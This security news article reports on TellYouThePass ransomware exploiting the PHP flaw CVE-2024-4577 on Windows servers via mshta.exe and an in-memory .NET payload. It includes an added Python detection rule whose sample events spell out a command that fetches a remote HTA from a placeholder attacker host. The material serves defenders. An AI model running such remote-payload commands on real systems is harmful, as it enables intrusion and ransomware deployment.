Flaw Allows Unauthenticated Attackers to Execute Arbitrary Code
A ransomware operation with a history of exploiting widespread internet vulnerabilities lost little time in making use of a critical severity vulnerability in Windows installations of the web-scripting language PHP.
Imperva Threat Research in a Monday report said TellYouThePass ransomware operators began exploiting the PHP bug, tracked as CVE-2024-4577, hours after researchers released a proof-of-concept script (see: Critical PHP Vulnerability Threatens Windows Servers).
The TellYouThePass ransomware group, active since 2019, sees opportunity in cyber incidents that have system administrators globally scrambling to patch systems. It was among the cybercriminal groups to jump on the 2021 vulnerability known as Log4Shell. Security researchers say it has a history of appearing in new forms. Chinese network security firm Snagfor spotted it in March.
Imperva researchers said Monday they observed multiple hacking attempts against Windows PHP systems involving webshell uploads and efforts to deploy ransomware.
Attackers use the PHP flaw to execute arbitrary PHP code, calling PHP's system function to run an HTML application file hosted on a hacker-controlled web server. The attackers use mshta.exe to launch the attack – mshta.exe is a “native Windows binary that can execute remote payloads, pointing to the attackers operating in a ‘living off the land’ style,” wrote Imperva researchers.
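One way a defender can look for the chain described above is to check process-creation telemetry for a PHP worker that spawns mshta.exe with a remote .hta URL. The following is an added example, not code from Imperva's report; the Sysmon-style field names, the list of PHP/web-server parent images and the sample events are all constructed assumptions.

```python
"""Flag PHP-on-Windows processes launching mshta.exe against a remote HTA.

Added detection example over constructed process-creation events; field
names mirror Sysmon Event ID 1 (ParentImage, Image, CommandLine) but are
an assumption, not a specific product's schema.
"""
import re

# Assumed set of PHP / web-server worker images that should never spawn mshta.exe
PHP_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}
LOLBIN = "mshta.exe"
# Remote .hta fetched over HTTP(S), as in the dd3.hta stage described in the article
REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)


def parse_event(line):
    """Parse one constructed key="value" event line into a dict."""
    return dict(re.findall(r'(\w+)="([^"]*)"', line))


def image_name(path):
    """Return the bare file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_suspicious(event):
    """True when a PHP worker spawns mshta.exe with a remote .hta argument."""
    parent = image_name(event.get("ParentImage", ""))
    child = image_name(event.get("Image", ""))
    cmdline = event.get("CommandLine", "")
    return child == LOLBIN and parent in PHP_PARENTS and bool(REMOTE_HTA.search(cmdline))


def find_suspicious(lines):
    """Return the parsed events that match the detection."""
    return [e for e in map(parse_event, lines) if is_suspicious(e)]


# Constructed sample telemetry; attacker.invalid is a placeholder host, not an IoC.
SAMPLE_EVENTS = [
    'EventId="1" ParentImage="C:\\php\\php-cgi.exe" Image="C:\\Windows\\System32\\mshta.exe" '
    'CommandLine="mshta.exe http://attacker.invalid/dd3.hta"',
    'EventId="1" ParentImage="C:\\Windows\\explorer.exe" Image="C:\\Windows\\System32\\mshta.exe" '
    'CommandLine="mshta.exe C:\\Users\\u\\local.hta"',
    'EventId="1" ParentImage="C:\\php\\php-cgi.exe" Image="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="cmd.exe /c dir"',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print("ALERT: PHP worker spawned mshta.exe ->", hit["CommandLine"])
```

Only the first constructed event trips the check; a user launching a local HTA from Explorer, or PHP running cmd.exe, does not match this particular rule.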
The initial infection involves an HTML application named dd3.hta containing a malicious VBScript. The VBScript included a base64-encoded string that, when decoded, revealed the bytes of a binary loaded into memory at runtime.
The extracted bytes revealed a serialized method, which loads a Portable Executable file into memory during runtime – a .NET variant of the TellYouThePass ransomware. Once executed, the file sends an HTTP request to the command-and-control server, containing details about the infected machine. The callback masquerades as a request to retrieve CSS resources, likely to evade detection.
The command and control IP was hardcoded in the sample studied by Imperva. The malware concludes by publishing a ReadMe message in the web root directory, providing details necessary for a ransom payment.